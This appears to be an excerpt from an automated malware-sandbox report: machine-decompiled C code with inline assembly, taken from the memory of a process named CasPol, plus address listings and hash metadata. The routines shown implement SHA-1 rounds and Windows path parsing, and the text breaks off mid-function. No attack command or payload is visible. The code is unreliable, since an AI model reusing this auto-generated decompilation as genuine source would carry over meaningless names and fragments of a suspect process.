					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9ebc9
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                                                                                                                                                                                                                                                                                                                            0x0040c01e
                                                                                                                                                                                                                                                                                                                            0x0040c022
                                                                                                                                                                                                                                                                                                                            0x0040c024
                                                                                                                                                                                                                                                                                                                            0x0040c024
                                                                                                                                                                                                                                                                                                                            0x0040c027
                                                                                                                                                                                                                                                                                                                            0x0040c049
                                                                                                                                                                                                                                                                                                                            0x0040c06f
                                                                                                                                                                                                                                                                                                                            0x0040c095
                                                                                                                                                                                                                                                                                                                            0x0040c0b7
                                                                                                                                                                                                                                                                                                                            0x0040c0be
                                                                                                                                                                                                                                                                                                                            0x0040c0c1
                                                                                                                                                                                                                                                                                                                            0x0040c0c4
                                                                                                                                                                                                                                                                                                                            0x0040c0cd
                                                                                                                                                                                                                                                                                                                            0x0040c0d3
                                                                                                                                                                                                                                                                                                                            0x0040c0da
                                                                                                                                                                                                                                                                                                                            0x0040c0eb
                                                                                                                                                                                                                                                                                                                            0x0040c0ee
                                                                                                                                                                                                                                                                                                                            0x0040c0f1
                                                                                                                                                                                                                                                                                                                            0x0040c0f5
                                                                                                                                                                                                                                                                                                                            0x0040c0f7
                                                                                                                                                                                                                                                                                                                            0x0040c0f9
                                                                                                                                                                                                                                                                                                                            0x0040c102
                                                                                                                                                                                                                                                                                                                            0x0040c105
                                                                                                                                                                                                                                                                                                                            0x0040c108
                                                                                                                                                                                                                                                                                                                            0x0040c113
                                                                                                                                                                                                                                                                                                                            0x0040c119
                                                                                                                                                                                                                                                                                                                            0x0040c11b
                                                                                                                                                                                                                                                                                                                            0x0040c11b
                                                                                                                                                                                                                                                                                                                            0x0040c11e
                                                                                                                                                                                                                                                                                                                            0x0040c121
                                                                                                                                                                                                                                                                                                                            0x0040c121
                                                                                                                                                                                                                                                                                                                            0x0040c126
                                                                                                                                                                                                                                                                                                                            0x0040c128
                                                                                                                                                                                                                                                                                                                            0x0040c12b
                                                                                                                                                                                                                                                                                                                            0x0040c12e
                                                                                                                                                                                                                                                                                                                            0x0040c134
                                                                                                                                                                                                                                                                                                                            0x0040c137
                                                                                                                                                                                                                                                                                                                            0x0040c13a
                                                                                                                                                                                                                                                                                                                            0x0040c143
                                                                                                                                                                                                                                                                                                                            0x0040c149
                                                                                                                                                                                                                                                                                                                            0x0040c152
                                                                                                                                                                                                                                                                                                                            0x0040c161
                                                                                                                                                                                                                                                                                                                            0x0040c168
                                                                                                                                                                                                                                                                                                                            0x0040c16b
                                                                                                                                                                                                                                                                                                                            0x0040c16e
                                                                                                                                                                                                                                                                                                                            0x0040c177
                                                                                                                                                                                                                                                                                                                            0x0040c17a
                                                                                                                                                                                                                                                                                                                            0x0040c17d
                                                                                                                                                                                                                                                                                                                            0x0040c195
                                                                                                                                                                                                                                                                                                                            0x0040c19c
                                                                                                                                                                                                                                                                                                                            0x0040c19e
                                                                                                                                                                                                                                                                                                                            0x0040c1a1
                                                                                                                                                                                                                                                                                                                            0x0040c1a4
                                                                                                                                                                                                                                                                                                                            0x0040c1ad
                                                                                                                                                                                                                                                                                                                            0x0040c1b4
                                                                                                                                                                                                                                                                                                                            0x0040c1b7
                                                                                                                                                                                                                                                                                                                            0x0040c1ba
                                                                                                                                                                                                                                                                                                                            0x0040c1c9
                                                                                                                                                                                                                                                                                                                            0x0040c1d0
                                                                                                                                                                                                                                                                                                                            0x0040c1d3
                                                                                                                                                                                                                                                                                                                            0x0040c1d6
                                                                                                                                                                                                                                                                                                                            0x0040c1df
                                                                                                                                                                                                                                                                                                                            0x0040c1e9
                                                                                                                                                                                                                                                                                                                            0x0040c1ec
                                                                                                                                                                                                                                                                                                                            0x0040c1f8
                                                                                                                                                                                                                                                                                                                            0x0040c1fb
                                                                                                                                                                                                                                                                                                                            0x0040c202
                                                                                                                                                                                                                                                                                                                            0x0040c205
                                                                                                                                                                                                                                                                                                                            0x0040c208
                                                                                                                                                                                                                                                                                                                            0x0040c20d
                                                                                                                                                                                                                                                                                                                            0x0040c210
                                                                                                                                                                                                                                                                                                                            0x0040c219
                                                                                                                                                                                                                                                                                                                            0x0040c22a
                                                                                                                                                                                                                                                                                                                            0x0040c22d
                                                                                                                                                                                                                                                                                                                            0x0040c230
                                                                                                                                                                                                                                                                                                                            0x0040c237
                                                                                                                                                                                                                                                                                                                            0x0040c23a
                                                                                                                                                                                                                                                                                                                            0x0040c23d
                                                                                                                                                                                                                                                                                                                            0x0040c240
                                                                                                                                                                                                                                                                                                                            0x0040c242
                                                                                                                                                                                                                                                                                                                            0x0040c245
                                                                                                                                                                                                                                                                                                                            0x0040c248
                                                                                                                                                                                                                                                                                                                            0x0040c251
                                                                                                                                                                                                                                                                                                                            0x0040c256
                                                                                                                                                                                                                                                                                                                            0x0040c256
                                                                                                                                                                                                                                                                                                                            0x0040c26b
                                                                                                                                                                                                                                                                                                                            0x0040c26e
                                                                                                                                                                                                                                                                                                                            0x0040c271
                                                                                                                                                                                                                                                                                                                            0x0040c278
                                                                                                                                                                                                                                                                                                                            0x0040c27b
                                                                                                                                                                                                                                                                                                                            0x0040c27e
                                                                                                                                                                                                                                                                                                                            0x0040c293
                                                                                                                                                                                                                                                                                                                            0x0040c29a
                                                                                                                                                                                                                                                                                                                            0x0040c29d
                                                                                                                                                                                                                                                                                                                            0x0040c2a1
                                                                                                                                                                                                                                                                                                                            0x0040c2a4
                                                                                                                                                                                                                                                                                                                            0x0040c2a9
                                                                                                                                                                                                                                                                                                                            0x0040c2ac
                                                                                                                                                                                                                                                                                                                            0x0040c2bb
                                                                                                                                                                                                                                                                                                                            0x0040c2be
                                                                                                                                                                                                                                                                                                                            0x0040c2c5
                                                                                                                                                                                                                                                                                                                            0x0040c2c8
                                                                                                                                                                                                                                                                                                                            0x0040c2cb
                                                                                                                                                                                                                                                                                                                            0x0040c2ce
                                                                                                                                                                                                                                                                                                                            0x0040c2d1
                                                                                                                                                                                                                                                                                                                            0x0040c2d9
                                                                                                                                                                                                                                                                                                                            0x0040c2e7
                                                                                                                                                                                                                                                                                                                            0x0040c2ea
                                                                                                                                                                                                                                                                                                                            0x0040c2ed
                                                                                                                                                                                                                                                                                                                            0x0040c2ed
                                                                                                                                                                                                                                                                                                                            0x0040c2f4
                                                                                                                                                                                                                                                                                                                            0x0040c2f7
                                                                                                                                                                                                                                                                                                                            0x0040c2fa
                                                                                                                                                                                                                                                                                                                            0x0040c302
                                                                                                                                                                                                                                                                                                                            0x0040c310
                                                                                                                                                                                                                                                                                                                            0x0040c313
                                                                                                                                                                                                                                                                                                                            0x0040c31a
                                                                                                                                                                                                                                                                                                                            0x0040c31d
                                                                                                                                                                                                                                                                                                                            0x0040c320
                                                                                                                                                                                                                                                                                                                            0x0040c323
                                                                                                                                                                                                                                                                                                                            0x0040c326
                                                                                                                                                                                                                                                                                                                            0x0040c32f
                                                                                                                                                                                                                                                                                                                            0x0040c336
                                                                                                                                                                                                                                                                                                                            0x0040c336
                                                                                                                                                                                                                                                                                                                            0x0040c33c
                                                                                                                                                                                                                                                                                                                            0x0040c355
                                                                                                                                                                                                                                                                                                                            0x0040c358
                                                                                                                                                                                                                                                                                                                            0x0040c35f
                                                                                                                                                                                                                                                                                                                            0x0040c362
                                                                                                                                                                                                                                                                                                                            0x0040c365
                                                                                                                                                                                                                                                                                                                            0x0040c377
                                                                                                                                                                                                                                                                                                                            0x0040c381
                                                                                                                                                                                                                                                                                                                            0x0040c384
                                                                                                                                                                                                                                                                                                                            0x0040c38d
                                                                                                                                                                                                                                                                                                                            0x0040c390
                                                                                                                                                                                                                                                                                                                            0x0040c397
                                                                                                                                                                                                                                                                                                                            0x0040c39a
                                                                                                                                                                                                                                                                                                                            0x0040c3a0
                                                                                                                                                                                                                                                                                                                            0x0040c3b3
                                                                                                                                                                                                                                                                                                                            0x0040c3ba
                                                                                                                                                                                                                                                                                                                            0x0040c3bd
                                                                                                                                                                                                                                                                                                                            0x0040c3c0
                                                                                                                                                                                                                                                                                                                            0x0040c3c3
                                                                                                                                                                                                                                                                                                                            0x0040c3cc
                                                                                                                                                                                                                                                                                                                            0x0040c3cf
                                                                                                                                                                                                                                                                                                                            0x0040c3e2
                                                                                                                                                                                                                                                                                                                            0x0040c3e5
                                                                                                                                                                                                                                                                                                                            0x0040c3ef
                                                                                                                                                                                                                                                                                                                            0x0040c3f2
                                                                                                                                                                                                                                                                                                                            0x0040c3f4
                                                                                                                                                                                                                                                                                                                            0x0040c3fd
                                                                                                                                                                                                                                                                                                                            0x0040c400
                                                                                                                                                                                                                                                                                                                            0x0040c413
                                                                                                                                                                                                                                                                                                                            0x0040c419
                                                                                                                                                                                                                                                                                                                            0x0040c41c
                                                                                                                                                                                                                                                                                                                            0x0040c423
                                                                                                                                                                                                                                                                                                                            0x0040c425
                                                                                                                                                                                                                                                                                                                            0x0040c428
                                                                                                                                                                                                                                                                                                                            0x0040c42b
                                                                                                                                                                                                                                                                                                                            0x0040c42e
                                                                                                                                                                                                                                                                                                                            0x0040c431
                                                                                                                                                                                                                                                                                                                            0x0040c434
                                                                                                                                                                                                                                                                                                                            0x0040c43d
                                                                                                                                                                                                                                                                                                                            0x0040c442
                                                                                                                                                                                                                                                                                                                            0x0040c445
                                                                                                                                                                                                                                                                                                                            0x0040c445
                                                                                                                                                                                                                                                                                                                            0x0040c458
                                                                                                                                                                                                                                                                                                                            0x0040c45b
                                                                                                                                                                                                                                                                                                                            0x0040c45e
                                                                                                                                                                                                                                                                                                                            0x0040c465
                                                                                                                                                                                                                                                                                                                            0x0040c468
                                                                                                                                                                                                                                                                                                                            0x0040c46b
                                                                                                                                                                                                                                                                                                                            0x0040c46e
                                                                                                                                                                                                                                                                                                                            0x0040c481
                                                                                                                                                                                                                                                                                                                            0x0040c484
                                                                                                                                                                                                                                                                                                                            0x0040c48f
                                                                                                                                                                                                                                                                                                                            0x0040c492
                                                                                                                                                                                                                                                                                                                            0x0040c49e
                                                                                                                                                                                                                                                                                                                            0x0040c4a1
                                                                                                                                                                                                                                                                                                                            0x0040c4a7
                                                                                                                                                                                                                                                                                                                            0x0040c4aa
                                                                                                                                                                                                                                                                                                                            0x0040c4ad
                                                                                                                                                                                                                                                                                                                            0x0040c4b4
                                                                                                                                                                                                                                                                                                                            0x0040c4c4
                                                                                                                                                                                                                                                                                                                            0x0040c4c7
                                                                                                                                                                                                                                                                                                                            0x0040c4cd
                                                                                                                                                                                                                                                                                                                            0x0040c4d0
                                                                                                                                                                                                                                                                                                                            0x0040c4d7
                                                                                                                                                                                                                                                                                                                            0x0040c4d9
                                                                                                                                                                                                                                                                                                                            0x0040c4dc
                                                                                                                                                                                                                                                                                                                            0x0040c4df
                                                                                                                                                                                                                                                                                                                            0x0040c4e2
                                                                                                                                                                                                                                                                                                                            0x0040c4e5
                                                                                                                                                                                                                                                                                                                            0x0040c4ec
                                                                                                                                                                                                                                                                                                                            0x0040c4fb
                                                                                                                                                                                                                                                                                                                            0x0040c4fe
                                                                                                                                                                                                                                                                                                                            0x0040c505
                                                                                                                                                                                                                                                                                                                            0x0040c508
                                                                                                                                                                                                                                                                                                                            0x0040c50b
                                                                                                                                                                                                                                                                                                                            0x0040c50e
                                                                                                                                                                                                                                                                                                                            0x0040c511
                                                                                                                                                                                                                                                                                                                            0x0040c514
                                                                                                                                                                                                                                                                                                                            0x0040c517
                                                                                                                                                                                                                                                                                                                            0x0040c520
                                                                                                                                                                                                                                                                                                                            0x0040c531
                                                                                                                                                                                                                                                                                                                            0x0040c539
                                                                                                                                                                                                                                                                                                                            0x0040c53f
                                                                                                                                                                                                                                                                                                                            0x0040c542
                                                                                                                                                                                                                                                                                                                            0x0040c544
                                                                                                                                                                                                                                                                                                                            0x0040c547
                                                                                                                                                                                                                                                                                                                            0x0040c54a
                                                                                                                                                                                                                                                                                                                            0x0040c557

                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-3887548279
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 126da201e399a354888b8c1d6532e8032acd0ef72efab1350674e1e616d0c987
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65021DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 01244120 Relevance: .4, Instructions: 444COMMONCrypto
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                                                            			E01244120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x131d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = L0125F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = L01246E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01244620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = L01246E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M012445F8))) {
												case 0:
													_v568 = 0x1201078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x12011c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01244620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															L0126F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															L0126F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = L012252A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																L0123EB70(1, 0x13179a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = L0123AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
